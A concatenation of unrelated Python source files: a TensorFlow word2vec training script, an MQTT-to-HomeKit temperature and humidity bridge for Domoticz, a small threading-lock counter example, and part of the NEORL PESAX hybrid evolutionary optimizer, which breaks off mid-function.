    # Each worker keeps stepping the train op until the epoch counter moves.
    initial_epoch, = self._session.run([self._epoch])
    while True:
      _, epoch = self._session.run([self._train, self._epoch])
      if epoch != initial_epoch:
        break

  def train(self):
    """Train the model."""
    opts = self._options

    initial_epoch, initial_words = self._session.run([self._epoch, self._words])

    workers = []
    for _ in xrange(opts.concurrent_steps):
      t = threading.Thread(target=self._train_thread_body)
      t.start()
      workers.append(t)

    last_words, last_time = initial_words, time.time()
    while True:
      time.sleep(5)  # Reports our progress once a while.
      (epoch, step, words,
       lr) = self._session.run([self._epoch, self.step, self._words, self._lr])
      now = time.time()
      last_words, last_time, rate = words, now, (words - last_words) / (
          now - last_time)
      print "Epoch %4d Step %8d: lr = %5.3f words/sec = %8.0f\r" % (epoch, step,
                                                                    lr, rate),
      sys.stdout.flush()
      if epoch != initial_epoch:
        break

    for t in workers:
      t.join()

  def _predict(self, analogy):
    """Predict the top 4 answers for analogy questions."""
    idx, = self._session.run([self._analogy_pred_idx], {
        self._analogy_a: analogy[:, 0],
        self._analogy_b: analogy[:, 1],
        self._analogy_c: analogy[:, 2]
    })
    return idx

  def eval(self):
    """Evaluate analogy questions and reports accuracy."""

    # How many questions we get right at precision@1.
    correct = 0

    total = self._analogy_questions.shape[0]
    start = 0
    # Evaluate in batches of 2500 questions.
    while start < total:
      limit = start + 2500
      sub = self._analogy_questions[start:limit, :]
      idx = self._predict(sub)
      start = limit
      for question in xrange(sub.shape[0]):
        for j in xrange(4):
          if idx[question, j] == sub[question, 3]:
            # Bingo! We predicted correctly. E.g., [italy, rome, france, paris].
            correct += 1
            break
          elif idx[question, j] in sub[question, :3]:
            # We need to skip words already in the question.
            continue
          else:
            # The correct label is not the precision@1
            break
    print
    print "Eval %4d/%d accuracy = %4.1f%%" % (correct, total,
                                              correct * 100.0 / total)

  def analogy(self, w0, w1, w2):
    """Predict word w3 as in w0:w1 vs w2:w3."""
    wid = np.array([[self._word2id.get(w, 0) for w in [w0, w1, w2]]])
    idx = self._predict(wid)
    for c in [self._id2word[i] for i in idx[0, :]]:
      if c not in [w0, w1, w2]:
        return c
    return "unknown"

  def nearby(self, words, num=20):
    """Prints out nearby words given a list of words."""
    ids = np.array([self._word2id.get(x, 0) for x in words])
    vals, idx = self._session.run(
        [self._nearby_val, self._nearby_idx], {self._nearby_word: ids})
    for i in xrange(len(words)):
      print "\n%s\n=====================================" % (words[i])
      for (neighbor, distance) in zip(idx[i, :num], vals[i, :num]):
        print "%-20s %6.4f" % (self._id2word[neighbor], distance)
def _start_shell(local_ns=None):
  # An interactive shell is useful for debugging/development.
  # Seeds the IPython namespace with the caller's locals plus module globals.
  import IPython
  namespace = {}
  if local_ns:
    namespace.update(local_ns)
  namespace.update(globals())
  IPython.start_ipython(argv=[], user_ns=namespace)
def main(_):
  """Train a word2vec model.

  Requires --train_data, --eval_data and --save_path flags; trains for the
  configured number of epochs, evaluating analogies after each one, then
  saves a final checkpoint.
  """
  if not FLAGS.train_data or not FLAGS.eval_data or not FLAGS.save_path:
    print "--train_data --eval_data and --save_path must be specified."
    sys.exit(1)
  opts = Options()
  with tf.Graph().as_default(), tf.Session() as session:
    model = Word2Vec(opts, session)
    for _ in xrange(opts.epochs_to_train):
      model.train()  # Process one epoch
      model.eval()  # Eval analogies.
    # Perform a final save.
    model.saver.save(session, os.path.join(opts.save_path, "model.ckpt"),
                     global_step=model.step)
    if FLAGS.interactive:
      # E.g.,
      # [0]: model.Analogy('france', 'paris', 'russia')
      # [1]: model.Nearby(['proton', 'elephant', 'maxwell'])
      _start_shell(locals())
if __name__ == "__main__":
  # tf.app.run parses the flags and then calls main(_).
  tf.app.run()
|
engine.py | import sys
from pyhap.accessory_driver import AccessoryDriver
import json
import logging
import random
import signal
import time
import toml
from forms import convert
from paho.mqtt import client as mqtt_client
from pyhap.accessory import Accessory, Bridge
from pyhap.const import CATEGORY_SENSOR
from domoticz import fresh_list, acc_data
from multiprocessing import Process
# Static configuration (MQTT credentials, Domoticz URL, ...).
data = toml.load("data.toml")

logging.basicConfig(level=logging.DEBUG, format="[%(module)s] %(message)s")
log = logging.getLogger(__name__)

# MQTT connection settings read from the config file.
broker = data['mqtt']['broker']
port = data['mqtt']['port']
topic = data['mqtt']['topic']
# Random suffix keeps concurrent runs from clashing on the broker.
client_id = f'python-mqtt-{random.randint(0, 100)}'
username = data['mqtt']['username']
password = data['mqtt']['password']

# device id -> {sensor type: reading form}, filled by the MQTT subscriber
db = {}
# aid_db = {}
# Domoticz idx values currently exposed as HomeKit accessories.
idxes_list = []
# idxes_rem = []
def subscribe(client: mqtt_client):
    """Attach an on_message handler that mirrors MQTT device updates into `db`."""

    def on_message(client, userdata, msg):
        payload = json.loads(msg.payload.decode())
        dev_id, _form, _type = convert(payload)
        if not dev_id:
            log.debug(f"Device not added: "
                      f"id - [{dev_id}], type - [{_type}], form - [{_form}]")
        else:
            access = {dev_id: {_type: _form}}
            log.debug(f"Added device: {access}")
            db.update(access)
        log.debug(f"All current devices: {db}")

    client.subscribe(topic)
    client.on_message = on_message
def connect_mqtt() -> mqtt_client:
    """Create and connect an MQTT client using the module-level settings."""

    def on_connect(client, userdata, flags, rc):
        # rc == 0 means the broker accepted the connection.
        if rc != 0:
            log.error("Failed to connect, return code %d\n", rc)
        else:
            log.info("Connected to MQTT Broker!")

    client = mqtt_client.Client(client_id)
    client.username_pw_set(username, password)
    client.on_connect = on_connect
    client.connect(broker, port)
    return client
class TemperatureSensor(Accessory):
    """Temperature sensor."""

    category = CATEGORY_SENSOR

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.temp = 0.0  # last known temperature reading
        self.id = ''     # device id in the shared `db` this accessory mirrors
        serv_temp = self.add_preload_service('TemperatureSensor')
        self.char_temp = serv_temp.configure_char('CurrentTemperature')

    def set_id(self, _id):
        # Link this accessory to a device id in the global `db`.
        self.id = _id

    def current_temp(self, value):
        # Value may arrive as a string from MQTT/Domoticz; store as float.
        self.temp = float(value)

    @Accessory.run_at_interval(3)
    async def run(self):
        # Poll the shared `db` every 3 seconds and push the value to HomeKit.
        try:
            acc_values = db[self.id]['Temp']
            self.current_temp(acc_values['value'])
        except Exception:
            # Missing/partial db entry: keep reporting the last known value.
            pass
        self.char_temp.set_value(self.temp)
class HumiditySensor(Accessory):
    """Humidity sensor."""

    category = CATEGORY_SENSOR

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.hum_level = 0.0  # last known relative-humidity reading
        self.id = ''          # device id in the shared `db` this accessory mirrors
        serv_humidity = self.add_preload_service('HumiditySensor')
        self.char_level = serv_humidity.configure_char('CurrentRelativeHumidity')

    def set_id(self, _id):
        # Link this accessory to a device id in the global `db`.
        self.id = _id

    def current_humidity(self, value):
        # Value may arrive as a string from MQTT/Domoticz; store as float.
        self.hum_level = float(value)

    @Accessory.run_at_interval(3)
    async def run(self):
        # Poll the shared `db` every 3 seconds and push the value to HomeKit.
        try:
            acc_values = db[self.id]['Humidity']
            self.current_humidity(acc_values['value'])
        except Exception:
            # Missing/partial db entry: keep reporting the last known value.
            pass
        self.char_level.set_value(self.hum_level)
def get_bridge(driver, bridge):
    """Call this method to get a Bridge instead of a standalone accessory."""
    _url = data['domoticz']['url']
    acc_current = {}
    ids_list = []
    # Fetch the current state of every known idx from Domoticz.
    for idx in idxes_list:
        acc_id, _form, _type = acc_data(_url, idx, log)
        ids_list.append(acc_id)
        acc_current.update({acc_id: {_type: _form}})
    log.debug("* " * 40)
    log.debug(acc_current)
    log.debug("* " * 40)
    # Wrap each device reading in the matching accessory type.
    for key in ids_list:
        log.debug(f"Add accessory id: {key}")
        for _type, _value in acc_current[key].items():
            log.debug('> ' * 35)
            log.debug(f'Acc to add (idx {_value["idx"]}): {key}, {_type}, {_value}')
            log.debug('> ' * 35)
            if _type == 'Temp':
                bridge.add_accessory(get_temp_sensor(driver, key, acc_current))
            elif _type == 'Humidity':
                bridge.add_accessory(get_humidity_sensor(driver, key, acc_current))
    return bridge
def get_temp_sensor(driver, acc_id, acc_current):
    """Build a TemperatureSensor accessory from the cached Domoticz data."""
    info = acc_current[acc_id]['Temp']
    sensor = TemperatureSensor(driver, info['name'])
    sensor.set_info_service(model=info['model'], serial_number=info['idx'])
    sensor.current_temp(info['value'])
    sensor.set_id(_id=acc_id)
    return sensor
def get_humidity_sensor(driver, acc_id, acc_current):
    """Build a HumiditySensor accessory from the cached Domoticz data."""
    info = acc_current[acc_id]['Humidity']
    sensor = HumiditySensor(driver, info['name'])
    sensor.set_info_service(model=info['model'], serial_number=info['idx'])
    sensor.current_humidity(info['value'])
    sensor.set_id(_id=acc_id)
    return sensor
def get_accessory(driver):
    """Call this method to get a standalone Accessory."""
    sensor = TemperatureSensor(driver, 'MyTempSensor')
    return sensor
def start_proc():
    """Child-process entry point: run the MQTT client loop forever."""
    client = connect_mqtt()
    subscribe(client)
    client.loop_forever()
    # NOTE(review): loop_forever() only returns after a disconnect, so this
    # loop_stop() is effectively unreachable in normal operation.
    client.loop_stop()
def start_hk():
    """Child-process entry point: run the HomeKit accessory driver.

    Starts the MQTT mirror process, builds a Bridge from the current
    idxes_list, serves it until the driver stops, then tears the bridge
    down and terminates the MQTT process. The parent restarts this whole
    process whenever the device list changes.
    """
    mqtt_proc = Process(target=start_proc, args=(), daemon=True)
    mqtt_proc.start()
    # Start the accessory on port 51826
    driver = AccessoryDriver(port=51826, persist_file='accessory.state')
    bridge = Bridge(driver, 'Bridge')
    # Change `get_accessory` to `get_bridge` if you want to run a Bridge.
    driver.add_accessory(accessory=get_bridge(driver, bridge))
    # NOTE(review): bare attribute access below has no effect — leftover?
    driver.accessory
    # We want SIGTERM (terminate) to be handled by the driver itself,
    # so that it can gracefully stop the accessory, server and advertising.
    # signal.signal(signal.SIGINT, driver.signal_handler)
    signal.signal(signal.SIGTERM, driver.signal_handler)
    driver.start()
    log.debug(
        f"accessory_id values !!!: > > {bridge.accessories.values()}")
    # accessories = bridge.accessories
    # Collect the aids first, then pop: avoids mutating the dict while
    # iterating it.
    aids = []
    for aid, accessory in bridge.accessories.items():
        aids.append(aid)
        print(f'{aid} | {accessory}')
    for aid in aids:
        bridge.accessories[aid].services.clear()
        bridge.accessories.pop(aid)
    bridge.driver.config_changed()
    driver.accessory = None
    driver.config_changed()
    # aid => accessory.display_name
    # idx => name => aid
    # db = {"1": {"aid": 1, "name": "name_123"}}
    # bridge.accessories.clear()
    # global idxes_rem
    # for idx, value in aid_db.items():
    #     aid = int(value['aid'])
    #
    #     for _idx in idxes_rem:
    #
    #         if _idx == idx:
    #             bridge.accessories.pop(aid)
    # log.debug(f"accessory_id items : > > {bridge.accessories.items()}")
    # idxes_rem.clear()
    mqtt_proc.terminate()
def start():
    """Poll Domoticz for the device list and (re)start the HomeKit process
    whenever the set of device idx values changes."""
    global idxes_list
    hk_proc = Process(target=start_hk, args=())
    _url = data['domoticz']['url']
    while True:
        idxes_temp = fresh_list(_url, log)  # idx list()
        # Restart when any idx appeared or disappeared since last poll.
        restart = set(idxes_temp) != set(idxes_list)
        if restart:
            idxes_list = idxes_temp
            if hk_proc.is_alive():
                try:
                    hk_proc.terminate()
                    time.sleep(1)
                    log.debug("Process is terminating success")
                except Exception:
                    hk_proc.kill()
                    log.debug("Process is killing success")
            hk_proc = Process(target=start_hk, args=())
            hk_proc.start()
        time.sleep(40)
if __name__ == '__main__':
    start()
    # NOTE(review): start() loops forever, so this exit is never reached.
    sys.exit(0)
|
solution_3_no_fuzzy.py | import threading
# Total rabbit population, shared across all counter threads.
rabbits_colony_size: int = 0
counter_lock = threading.Lock()  # guards the shared counter
printer_lock = threading.Lock()  # keeps the two report lines together


def rabbit_counter(number_of_rabbits: int):
    """Atomically grow the colony by *number_of_rabbits* and report its size."""
    global rabbits_colony_size
    with counter_lock:
        rabbits_colony_size += number_of_rabbits
    with printer_lock:
        print(f'Now we have {rabbits_colony_size} rabbits')
        print('---------------')


# Spawn ten counters, one rabbit each, and wait for them all to finish.
workers = [threading.Thread(target=rabbit_counter, args=[1]) for _ in range(10)]
for thread in workers:
    thread.start()
for thread in workers:
    thread.join()
print('All rabbits are counted')
|
pesax.py | # This file is part of NEORL.
# Copyright (c) 2021 Exelon Corporation and MIT Nuclear Science and Engineering
# NEORL is free software: you can redistribute it and/or modify
# it under the terms of the MIT LICENSE
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# -*- coding: utf-8 -*-
#"""
#Created on Sun Jun 28 18:21:05 2020
#
#@author: Majdi Radaideh
#"""
from neorl.hybrid.pesacore.er import ExperienceReplay
from neorl.hybrid.pesacore.de import DEmod
from neorl.hybrid.pesacore.es import ESMod
from neorl.hybrid.pesacore.pso import PSOMod
from copy import deepcopy
from multiprocessing import Process, Queue
import random
import numpy as np
from collections import defaultdict
import time
from neorl.utils.seeding import set_neorl_seed
class PESAX(ExperienceReplay):
"""
PESAX: A hybrid algorithm of PSO, ES, and DE. This is the implementation used in Appendix B of: Radaideh et al. (2021). Prioritized Experience Replay for Parallel Hybrid Evolutionary and Swarm Algorithms: Application to Nuclear Fuel, Under Review.
*PESAX Major Parameters*
:param mode: (str) problem type, either "min" for minimization problem or "max" for maximization
:param bounds: (dict) input parameter type and lower/upper bounds in dictionary form. Example: ``bounds={'x1': ['int', 1, 4], 'x2': ['float', 0.1, 0.8], 'x3': ['float', 2.2, 6.2]}``
:param fit: (function) the fitness function
:param npop: (int) total number of individuals in each group. So for ES, PSO, and SA, full population is ``npop*3``.
:param mu: (int) number of individuals to survive to the next generation.
Also, ``mu`` equals to the number of individuals to sample from the memory. If None, ``mu=int(npop/2)``.
So 1/2 of PESA population comes from previous generation, and 1/2 comes from the replay memory (See **Notes** below for more info)
:param memory_size: (int) max size of the replay memory (if None, ``memory_size`` is built to accommodate all samples during search)
:param alpha_init: (float) initial value of the prioritized replay coefficient (See **Notes** below)
:param alpha_end: (float) final value of the prioritized replay coefficient (See **Notes** below)
:param alpha_backdoor: (float) backdoor greedy replay rate/probability to sample from the memory for SA instead of random-walk (See **Notes** below)
*PESAX Auxiliary Parameters (for the internal algorithms)*
:param cxpb: (float) for **ES**, population crossover probability between [0,1]
:param mutpb: (float) for **ES**, population mutation probability between [0,1]
:param c1: (float) for **PSO**, cognitive speed constant
:param c2: (float) for **PSO**, social speed constant
:param speed_mech: (str) for **PSO**, type of speed mechanism for to update particle velocity, choose between ``constric``, ``timew``, ``globw``.
:param CR: (float) for **DE**, crossover probability between [0,1]
:param F: (float) for **DE**, differential/mutation weight between [0,2]
*PESAX Misc. Parameters*
:param ncores: (int) number of parallel processors
:param seed: (int) random seed for sampling
"""
    def __init__ (self, mode, bounds, fit, npop, mu=None, #general parameters
                  memory_size=None, alpha_init=0.1, alpha_end=1, #replay parameters
                  CR=0.7, F=0.5, #DE parameters
                  cxpb=0.7, mutpb=0.2, #ES parameters
                  c1=2.05, c2=2.05, speed_mech='constric', #PSO parameters
                  ncores=1, seed=None): #misc parameters
        """Configure the PESAX hybrid optimizer; see the class docstring for
        the meaning of every parameter."""
        #--------------------
        #General Parameters
        #--------------------
        set_neorl_seed(seed)
        self.BOUNDS=bounds
        #--mir
        self.mode=mode
        # Internally PESAX always maximizes: `min` problems are handled by
        # maximizing the negated fitness (sign is flipped back in evolute()).
        if mode == 'max':
            self.FIT=fit
        elif mode == 'min':
            def fitness_wrapper(*args, **kwargs):
                return -fit(*args, **kwargs)
            self.FIT=fitness_wrapper
        else:
            raise ValueError('--error: The mode entered by user is invalid, use either `min` or `max`')

        self.NPOP=npop
        self.pso_flag=True
        # With <=3 cores run everything serially; otherwise split the cores
        # across the 3 inner algorithms (or 2 when PSO is disabled).
        if ncores <= 3:
            self.NCORES=1
            self.PROC=False
        else:
            self.PROC=True
            if self.pso_flag:
                self.NCORES=int(ncores/3)
            else:
                self.NCORES=int(ncores/2)
        # option for first-level parallelism
        #self.PROC=True
        self.SEED=seed
        #--------------------
        #Experience Replay
        #--------------------
        # 'prior' = prioritized replay; ALPHA is annealed from ALPHA0 to ALPHA1
        self.MODE='prior'; self.ALPHA0=alpha_init; self.ALPHA1=alpha_end
        #--------------------
        # DE hyperparameters
        #--------------------
        self.F=F
        self.CR=CR
        #--------------------
        # ES HyperParameters
        #--------------------
        if mu:
            assert mu < npop, '--error: The value of mu ({}) MUST be less than npop ({})'.format(mu, npop)
            self.MU=mu
        else:
            self.MU=int(npop/2)
        self.CXPB=cxpb; self.MUTPB=mutpb; self.INDPB=1.0
        #--------------------
        # PSO HyperParameters
        #--------------------
        self.C1=c1; self.C2=c2; self.SPEED_MECH=speed_mech
        #-------------------------------
        #Memory Supply for each method
        #-------------------------------
        # Number of individuals each method replays from memory per generation
        self.ES_MEMORY=self.MU
        self.DE_MEMORY=self.NPOP-self.MU
        self.PSO_MEMORY=self.NPOP-self.MU
        #--------------------
        # Fixed/Derived parameters
        #--------------------
        self.nx=len(self.BOUNDS) #all
        self.memory_size=memory_size
        self.LAMBDA=self.NPOP #ES
        self.NPAR=self.NPOP #PSO
        self.SMIN = 1/self.nx #ES
        self.SMAX = 0.5 #ES
        self.v0=0.1 #constant to initialize PSO speed, not very important
    def evolute(self, ngen, x0=None, warmup=100, verbose=0):
        """
        This function evolutes the PESAX algorithm for number of generations.

        :param ngen: (int) number of generations to evolute
        :param x0: (list of lists) initial samples to start the replay memory (``len(x0)`` must be equal or more than ``npop``)
        :param warmup: (int) number of random warmup samples to initialize the replay memory and must be equal or more than ``npop`` (only used if ``x0=None``)
        :param verbose: (int) print statistics to screen, 0: no print, 1: PESA print, 2: detailed print

        :return: (tuple) (best individual, best fitness, and a list of fitness history)
        """
        self.verbose=verbose
        self.NGEN=ngen
        self.STEPS=self.NGEN*self.NPOP #all
        # If no explicit cap was given, size the memory to hold every sample
        # produced by the three methods over the whole run.
        if self.memory_size:
            self.MEMORY_SIZE=self.memory_size
        else:
            self.MEMORY_SIZE=self.STEPS*3+1 #PESA

        #-------------------------------------------------------
        # Check if initial pop is provided as initial guess
        #-------------------------------------------------------
        if x0:
            # use provided initial guess
            warm=ESMod(bounds=self.BOUNDS, fit=self.FIT, mu=self.MU, lambda_=self.LAMBDA, ncores=self.NCORES)
            x0size=len(x0)
            assert x0size >= self.NPOP, 'the number of lists in x0 ({}) must be more than or equal npop ({})'.format(x0size, self.NPOP)
            self.pop0=warm.init_pop(warmup=x0size, x_known=x0) #initial population for ES
        else:
            #create initial guess
            assert warmup > self.NPOP, 'the number of warmup samples ({}) must be more than npop ({})'.format(warmup, self.NPOP)
            warm=ESMod(bounds=self.BOUNDS, fit=self.FIT, mu=self.MU, lambda_=self.LAMBDA, ncores=self.NCORES)
            self.pop0=warm.init_pop(warmup=warmup) #initial population for ES

        # Wall-clock bookkeeping per method, one entry per generation.
        self.partime={}
        self.partime['pesa']=[]
        self.partime['es']=[]
        self.partime['pso']=[]
        self.partime['de']=[]
        self.fit_hist=[]
        #------------------------------
        # Step 1: Initialize the memory
        #------------------------------
        self.mymemory=ExperienceReplay(size=self.MEMORY_SIZE) #memory object
        xvec0, obj0=[self.pop0[item][0] for item in self.pop0], [self.pop0[item][2] for item in self.pop0] #parse the initial samples
        self.mymemory.add(xvec=xvec0, obj=obj0, method=['na']*len(xvec0)) # add initial samples to the replay memory
        #--------------------------------
        # Step 2: Initialize all methods
        #--------------------------------
        # Obtain initial population for all methods
        espop0, swarm0, swm_pos0, swm_fit0, local_pos, local_fit, x0_de, fit0_de=self.init_guess(pop0=self.pop0)
        # Initialize ES class
        es=ESMod(bounds=self.BOUNDS, fit=self.FIT, mu=self.MU, lambda_=self.LAMBDA, ncores=self.NCORES, indpb=self.INDPB,
                 cxpb=self.CXPB, mutpb=self.MUTPB, smin=self.SMIN, smax=self.SMAX)
        # Initialize DE class
        de=DEmod(bounds=self.BOUNDS, fit=self.FIT, npop=self.NPOP, F=self.F,
                 CR=self.CR, ncores=self.NCORES, seed=self.SEED)
        # Initialize PSO class (if USED)
        if self.pso_flag:
            pso=PSOMod(bounds=self.BOUNDS, fit=self.FIT, npar=self.NPAR, swm0=[swm_pos0,swm_fit0],
                       ncores=self.NCORES, c1=self.C1, c2=self.C2, speed_mech=self.SPEED_MECH)
        #--------------------------------
        # Step 3: Initialize PESA engine
        #--------------------------------
        #Use initial samples as first guess for DE, ES, and PSO
        self.pop_next=deepcopy(espop0) # x0 for ES
        self.de_next=deepcopy(x0_de) # x0 for DE
        if self.pso_flag:
            self.swm_next, self.local_pos_next, self.local_fit_next=deepcopy(swarm0), deepcopy(local_pos), deepcopy(local_fit) # x0 for PSO (if used)
        self.STEP0=1 #step counter
        self.ALPHA=self.ALPHA0 #set alpha to alpha0
        #--------------------------------
        # Step 4: PESA evolution
        #--------------------------------
        for gen in range(1,self.NGEN+1):
            caseids=['es_gen{}_ind{}'.format(gen,ind+1) for ind in range(self.LAMBDA)] # save caseids for ES
            if self.pso_flag:
                pso_caseids=['pso_gen{}_par{}'.format(gen+1,ind+1) for ind in range(self.NPAR)] # save caseids for PSO
            #-------------------------------------------------------------------------------------------------------------------
            # Step 5: evolute all methods for 1 generation
            #-------------------------------------------------------------------------------------------------------------------
            #**********************************
            #--Step 5A: Complete PARALEL calcs
            # via multiprocess.Process
            #*********************************
            if self.PROC:
                t0=time.time()
                # One result queue per method; each worker runs one generation
                # and pushes its results back to the parent.
                QDE = Queue(); QES=Queue(); QPSO=Queue()
                def de_worker():
                    random.seed(self.SEED)
                    xde_best, yde_best, de_new=de.evolute(ngen=1,x0=self.de_next, verbose=0)
                    QDE.put((xde_best, yde_best, de_new))
                def es_worker():
                    random.seed(self.SEED)
                    pop_new, es_partime=es.evolute(population=self.pop_next,ngen=1,caseids=caseids)
                    QES.put((pop_new, es_partime))
                def pso_worker():
                    random.seed(self.SEED)
                    # After generation 1 the global swarm best is known and is
                    # passed explicitly via swm_best.
                    if gen > 1:
                        swm_new, swm_pos_new, swm_fit_new, pso_partime=pso.evolute(ngen=1, swarm=self.swm_next, local_pos=self.local_pos_next, local_fit=self.local_fit_next,
                                                                                  swm_best=[self.swm_pos, self.swm_fit], mu=self.MU, exstep=self.STEP0, exsteps=self.STEPS,
                                                                                  caseids=pso_caseids, verbose=0)
                    else:
                        swm_new, swm_pos_new, swm_fit_new, pso_partime=pso.evolute(ngen=1, swarm=self.swm_next, local_pos=self.local_pos_next,
                                                                                  local_fit=self.local_fit_next, mu=self.MU, exstep=self.STEP0, exsteps=self.STEPS,
                                                                                  caseids=pso_caseids, verbose=0)
                    QPSO.put((swm_new, swm_pos_new, swm_fit_new, pso_partime))
                Process(target=de_worker).start()
                Process(target=es_worker).start()
                if self.pso_flag:
                    Process(target=pso_worker).start()
                    # Queue.get() blocks until the corresponding worker finishes.
                    self.swm_next, self.swm_pos, self.swm_fit, pso_partime=QPSO.get()
                    # Slots 3/4 of each swarm entry hold the particle's local
                    # best position/fitness.
                    self.local_pos_next=[self.swm_next[key][3] for key in self.swm_next]
                    self.local_fit_next=[self.swm_next[key][4] for key in self.swm_next]
                self.de_best, self.yde_best, self.de_next=QDE.get()
                self.pop_next, es_partime=QES.get()
                #self.partime.append(time.time()-t0)
                self.partime['pesa'].append(time.time()-t0)
                self.partime['pso'].append(pso_partime)
                self.partime['es'].append(es_partime)
                #print(self.partime)
            #*********************************
            #--Step 5B: Complete Serial calcs
            #*********************************
            else:
                self.pop_next, _ =es.evolute(population=self.pop_next,ngen=1,caseids=caseids) #ES serial
                self.de_best, self.yde_best, self.de_next=de.evolute(ngen=1,x0=self.de_next, verbose=0)
                if self.pso_flag:
                    self.swm_next, self.swm_pos, self.swm_fit, _ =pso.evolute(ngen=1, swarm=self.swm_next, local_pos=self.local_pos_next,
                                                                              local_fit=self.local_fit_next, exstep=self.STEP0, exsteps=self.STEPS,
                                                                              caseids=pso_caseids, mu=self.MU, verbose=0)
                    self.local_pos_next=[self.swm_next[key][3] for key in self.swm_next]
                    self.local_fit_next=[self.swm_next[key][4] for key in self.swm_next]
            #*********************************************************
            # Step 5C: Obtain relevant statistics for this generation
            #*********************************************************
            self.STEP0=self.STEP0+self.NPOP #update step counter
            self.de_next=self.select(pop=self.de_next, k=self.MU) #Keep top DE population
            self.inds, self.rwd=[self.pop_next[i][0] for i in self.pop_next], [self.pop_next[i][2] for i in self.pop_next] #ES statistics
            self.mean_strategy=[np.mean(self.pop_next[i][1]) for i in self.pop_next] #ES statistics
            if self.pso_flag:
                self.pars, self.fits=[self.swm_next[i][0] for i in self.swm_next], [self.swm_next[i][2] for i in self.swm_next] #PSO statistics
                self.mean_speed=[np.mean(self.swm_next[i][1]) for i in self.swm_next]
            if self.verbose==2:
                self.printout(mode=1, gen=gen)
            #-------------------------------------------------------------------------------------------------------------------
            #-------------------------------------------------------------------------------------------------------------------

            #-----------------------------
            # Step 6: Update the memory
            #-----------------------------
            self.memory_update()

            #-----------------------------------------------------------------
            # Step 7: Sample from the memory and prepare for next Generation
            #-----------------------------------------------------------------
            self.resample()

            #--------------------------------------------------------
            # Step 8: Anneal Alpha if priortized replay is used
            #--------------------------------------------------------
            if self.MODE=='prior': #anneal alpha between alpha0 (lower) and alpha1 (upper)
                self.ALPHA=self.linear_anneal(step=self.STEP0, total_steps=self.STEPS, a0=self.ALPHA0, a1=self.ALPHA1)

            #--------------------------------------------------------
            # Step 9: Calculate the memory best and print PESA summary
            #--------------------------------------------------------
            self.pesa_best=self.mymemory.sample(batch_size=1,mode='greedy')[0] #`greedy` will sample the best in memory
            self.fit_hist.append(self.pesa_best[1])
            self.memory_size=len(self.mymemory.storage) #memory size so far
            if self.verbose: #print summary data to screen
                self.printout(mode=2, gen=gen)

            #--mir
            # Fitness is stored for maximization; flip the sign back for `min`.
            if self.mode=='min':
                self.fitness_best=-self.pesa_best[1]
            else:
                self.fitness_best=self.pesa_best[1]

        #--mir
        if self.mode=='min':
            self.fit_hist=[-item for item in self.fit_hist]

        return self.pesa_best[0], self.fitness_best, self.fit_hist
def select(self, pop, k=1):
#"""
#Select function sorts the population from max to min based on fitness and select k best
#Inputs:
# pop (dict): population in dictionary structure
# k (int): top k individuals are selected
#Returns:
# best_dict (dict): the new ordered dictionary with top k selected
#"""
pop=list(pop.items())
pop.sort(key=lambda e: e[1][1], reverse=True)
sorted_dict=dict(pop[:k])
#This block creates a new dict where keys are reset to 0 ... k in order to avoid unordered keys after sort
best_dict=defaultdict(list)
index=0
for key in sorted_dict:
best_dict[index].append(sorted_dict[key][0])
best_dict[index].append(sorted_dict[key][1])
index+=1
sorted_dict.clear()
return best_dict
def linear_anneal(self, step, total_steps, a0, a1):
#"""
#Anneal parameter between a0 and a1
#:param step: current time step
#:param total_steps: total numbe of time steps
#:param a0: lower bound of alpha/parameter
#:param a0: upper bound of alpha/parameter
#:return
# - annealed value of alpha/parameter
#"""
fraction = min(float(step) / total_steps, 1.0)
return a0 + fraction * (a1 - a0)
    def memory_update(self):
        #"""
        #This function updates the replay memory with the samples of SA, ES, and PSO (if used)
        #then remove the duplicates from the memory
        #"""
        # Push this generation's DE survivors (position at value index 0,
        # fitness at index 1) into the replay memory ...
        de_x, de_y=[self.de_next[item][0] for item in self.de_next], [self.de_next[item][1] for item in self.de_next]
        self.mymemory.add(xvec=tuple(de_x), obj=de_y, method=['na']*len(de_x))
        # ... followed by the ES individuals gathered in Step 5C ...
        self.mymemory.add(xvec=tuple(self.inds), obj=self.rwd, method=['na']*len(self.inds))
        # ... and the PSO particles, when PSO participates.
        if self.pso_flag:
            self.mymemory.add(xvec=tuple(self.pars), obj=self.fits, method=['na']*len(self.pars))
        #self.mymemory.remove_duplicates() #remove all duplicated samples in memory to avoid biased sampling
    def resample(self):
        #"""
        #This function samples data from the memory and prepares the chains for SA
        #the population for ES, and the swarm for PSO for the next generation
        #  -SA: initial guess for the parallel chains are sampled from the memroy
        #  -ES: a total of ES_MEMORY (or MU) individuals are sampled from the memory and appended to ES population
        #  -PSO: a total of PSO_MEMORY (or MU) particles are sampled from the memory and appended to PSO swarm
        #For SA: x_next and E_next particpate in next generation
        #For PSO: swm_next, local_pso_next, and local_fit_next particpate in next generation
        #For ES: pop_next particpates in next generation
        #"""
        # ES: survivors occupy keys 0..MU-1; replayed samples fill the keys
        # from MU up, each as [individual, fresh random strategy vector,
        # fitness].  pop_next is a defaultdict(list), so indexing a new key
        # creates an empty list to append into.
        es_replay=self.mymemory.sample(batch_size=self.ES_MEMORY,mode=self.MODE,alpha=self.ALPHA)
        index=self.MU
        for sample in range(self.ES_MEMORY):
            self.pop_next[index].append(es_replay[sample][0])
            self.pop_next[index].append([random.uniform(self.SMIN,self.SMAX) for _ in range(self.nx)])
            self.pop_next[index].append(es_replay[sample][1])
            index+=1

        if self.pso_flag:
            pso_replay=self.mymemory.sample(batch_size=self.PSO_MEMORY,mode=self.MODE,alpha=self.ALPHA)
            # Trim every swarm entry back to its first three slots
            # [position, velocity, fitness] before refilling.
            for key in self.swm_next:
                del self.swm_next[key][3:]
            index=self.MU
            for sample in range(self.PSO_MEMORY):
                # Replayed particle: position, v0-scaled initial velocity, fitness.
                self.swm_next[index].append(pso_replay[sample][0])
